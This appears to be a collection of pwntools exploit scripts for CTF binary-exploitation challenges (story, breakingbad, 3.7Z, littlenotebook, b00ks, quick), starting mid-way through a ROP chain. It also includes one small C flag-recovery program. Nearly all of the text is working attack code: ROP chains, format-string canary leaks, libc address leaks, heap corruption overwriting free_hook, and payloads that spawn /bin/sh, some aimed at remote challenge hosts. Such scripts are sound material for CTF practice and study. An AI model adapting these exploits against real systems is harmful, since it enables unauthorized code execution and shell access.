p.append(0x0806ed31) # pop ecx ; pop ebx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x080ea060) # padding without overwrite ebx
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x08049781) # int 0x80
tempnum=0
#debug()
io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
for i in xrange(0,16):
io.recvuntil('5 Save the result\n')
io.sendline('3')
io.recvuntil('input the integer x:')
io.sendline(str(tempnum))
io.recvuntil('input the integer y:')
io.sendline('1')
for j in p:
io.recvuntil('5 Save the result\n')
io.sendline('1')
io.recvuntil('input the integer x:')
io.sendline(str(ct.c_int32(j).value))
io.recvuntil('input the integer y:')
io.sendline('0')
io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()
西湖論劍_story
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './story'
#p = process(name)
p = remote('ctf2.linkedbyx.com',10955)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('Please Tell Your ID:')
p.sendline('aaaa%15$p')
p.recvuntil('aaaa')
x = p.recv()
canary = int(x[0:18],16)
pop_rdi_addr = 0x400bd3
main = 0x400876
pay = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts']) + p64(main)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay)
__libc_start_main_addr = u64(p.recv(6) + '\x00\x00')
system_addr = __libc_start_main_addr + 0x24c50
pay1 = "/bin/sh;%p"
p.recvuntil('Please Tell Your ID:')
p.sendline(pay1)
p.recvuntil('/bin/sh;')
binsh_addr = p.recv()
binsh_addr = int(binsh_addr[0:15],16)
pay2 = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay2)
print "canary: " + hex(canary)
print "__libc_start_main: " + hex(__libc_start_main_addr)
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
p.interactive()
# flag{35d06db7c9b25265da7ee6a384ebef5a}
i春秋_breakingbad
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './break'
p = process(name)
#p = remote('106.75.2.53',10008)
elf= ELF(name)
#libc = ELF('./bc.so.6')
if args.G:
gdb.attach(p)
#0x804863c
p.recvuntil("Yo, what's your name:\n")
pay = 'b'*12 + p32(elf.plt['puts']) + p32(0x8048470) + p32(elf.got['puts']) + 'aaa'
p.sendline(pay)
#Methamphetamine
p.recvuntil('aaa\n')
p.sendline('Methamphetamine' + '\xff\xff') #整數溢出
p.recvuntil('packing drugs...\n')
puts_addr = u32(p.recv(4))
system_addr = puts_addr - 0x2a540
success("puts_addr: " + hex(puts_addr))
success("system_addr: " + hex(system_addr))
p.recvuntil("Yo, what's your name:\n")
p.sendline('c'*12 + p32(elf.plt['read']) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8) + 'sir')
p.recv()
p.sendline('Methamphetamine' + '\xff\xff')
p.sendline('/bin/sh\x00')
p.interactive()
i春秋_3.7Z
from pwn import *
def login(data):
payload = ''
for i in range(len(data)):
payload += chr(i^ord(data[i]))
return payload
#p = process('./http')
p = remote( '106.75.2.53',80)
payload = 'User-Agent: '+login('useragent')
print payload
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
p.send(payload)
p.interactive()
p.interactive()
x計劃_littlenotebook
from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './littlennotebook'
p = process(name)
elf= ELF(name)
if args.G:
gdb.attach(p)
def add(num,data):
p.recvuntil('your choice?\n')
p.sendline("1")
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.recvuntil('input the content:')
p.sendline(str(data))
def edit(i,num,data):
p.recvuntil('your choice?\n')
p.sendline("2")
p.recvuntil('enter the index of notebook:\n')
p.sendline(str(i))
p.recvuntil('enter the lenth of notebook:\n')
p.sendline(str(num))
p.sendline(str(data))
def delete(i):
p.recvuntil('your choice?\n')
p.sendline("3")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
def show(i):
p.recvuntil('your choice?\n')
p.sendline("4")
p.recvuntil('enter the index:\n')
p.sendline(str(i))
#0x4009A7
#0x60209C
add(20,'a'*8)
add(20,'b'*8)
add(20,'c'*8)
delete(2)
delete(1)
pay1 = 'a'*24 + p64(0x21) + p64(0x60209C)
edit(0,40,pay1)
add(20,'/bin/sh\x00')
pay2 = p64(0x0000001400000002) + p64(0x60201800000000)
add(20,pay2)
show(0)
p.recvuntil('0:')
free_addr = u64(p.recv(6) + '\x00\x00')
lib_add = free_addr - 0x82ba0
system_addr = lib_add + 0x42510
success("free_addr: " + hex(free_addr))
success("lib_add: " + hex(lib_add))
success("system_addr: " + hex(system_addr))
edit(1,20,'/bin/sh\x00')
edit(0,8,p64(system_addr))
delete(1)
p.interactive()
Asis CTF 2016 b00ks
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './b00ks'
p = process(name)
#p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.G:
gdb.attach(p)
def creat(nsize,ndata,dsize,data):
p.recvuntil('> ')
p.sendline('1')
p.recvuntil('Enter book name size: ')
p.sendline(str(nsize))
p.recvuntil('Enter book name (Max 32 chars): ')
p.sendline(str(ndata))
p.recvuntil('Enter book description size: ')
p.sendline(str(dsize))
p.recvuntil('Enter book description: ')
p.sendline(str(data))
def delete(i):
p.recvuntil('> ')
p.sendline('2')
p.recvuntil('Enter the book id you want to delete: ')
p.sendline(str(i))
def edit(i,data):
p.recvuntil('> ')
p.sendline('3')
p.recvuntil('Enter the book id you want to edit: ')
p.sendline(str(i))
p.recvuntil('Enter new book description: ')
p.sendline(data)
def show():
p.recvuntil('> ')
p.sendline('4')
def change(data):
p.recvuntil('> ')
p.sendline('5')
p.recvuntil('Enter author name: ')
p.sendline(data)
#泄露heap地址
p.recvuntil('Enter author name: ')
p.sendline('a'*28 + 'q'*4)
creat(128,'b',32,'c')
creat(0x21000,'/bin/sh\x00',0x21000,'/bin/sh\x00')
show()
p.recvuntil('qqqq')
heap_addr = u64(p.recv(6) + '\x00\x00')
#泄露libc地址
pay1 = p64(1) + p64(heap_addr + 0x38) + p64(heap_addr - 0x30) + p64(0x32)
edit(1,pay1)
change('a'*28 + 's'*4)
show()
p.recvuntil('Name: ')
libc_addr = u64(p.recv(6) + '\x00\x00') - 0x59c010
free_hook = libc_addr + 0x3b68e8
#one_gadget = libc_addr + 0x4239e # 0x423f2 #0xe317e
system_addr = libc_addr + 0x42510
success("heap_aadr: " + hex(heap_addr))
success("libc_addr: " + hex(libc_addr))
success("free_hook: " + hex(free_hook))
success("system_addr: " + hex(system_addr))
#將free_hook地址內容寫爲system_addr,也可以寫爲one_gadget_addr
pay2 = p64(1) + p64(heap_addr + 0x38) + p64(free_hook) + p64(0x32)
edit(1,pay2)
pay3 = p64(system_addr) + p64(system_addr)
edit(1,pay3)
#getshell
delete(2)
p.interactive()
WhaleCTF_逆向練習
#include<stdio.h>
#include<string.h>
int main()
{
int esi,bl,ebx,i;
char flag[0x12];
char str[] = "sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138";
int num[] = {0x1,0x4,0xe,0xa,0x5,0x24,0x17,0x2a,0xd,0x13,0x1c,0xd,
0x1b,0x27,0x30,0x29,0x2a};
for(i=0;i<0x11;i++)
{
flag[i] = str[num[i]];
}
printf("flag: %s",flag);
// e2s6ry3r5s8f61024
return 0;
}
*ctf_quick
from pwn import *
import struct
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './quick'
#p = process(name)
p=remote('34.92.96.238',10000)
elf= ELF(name)
libc = ELF('./libc.so.6')
if args.G:
gdb.attach(p)
p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('2')
pay1 = str(elf.plt['printf']) + '\x00'*(16-len(str(elf.plt['printf']))) + p32(0x2) + p32(0x0) + p32(0x0) + p32(0x804a024) + 'a'*16 + p32(elf.plt['puts']) + p32(0x8048816) + p32(0x804a02c)
p.recvuntil('the 1th number:')
p.sendline(pay1)
pay2 = '134514016' + '\x00'*7 + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a018-4)
p.recvuntil('the 2th number:')
p.sendline(pay2)
p.recvuntil('Here is the result:')
x = p.recv()
lib_main_addr = u32(x[64:68])
libc_addr = lib_main_addr - libc.symbols['__libc_start_main'] #0x18d90
system_addr = libc_addr + libc.symbols['system'] #0x3cd10 #
binsh_addr = libc_addr + next(libc.search('/bin/sh')) #0x17b988 #
print(hex(libc.symbols['__libc_start_main']))
#p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('1')
x = struct.unpack("i",p32(system_addr))
x = x[0]
print("x: " + str(x))
pay2 = str(x) + '\x00'*(16-len(str(x))) + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a024) + 'a'*16 + p32(system_addr) + p32(0x8048816) + p32(binsh_addr)
p.recvuntil('the 1th number:')
p.sendline(pay2)
success("lib_main_addr: " + hex(lib_main_addr))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
p.interactive()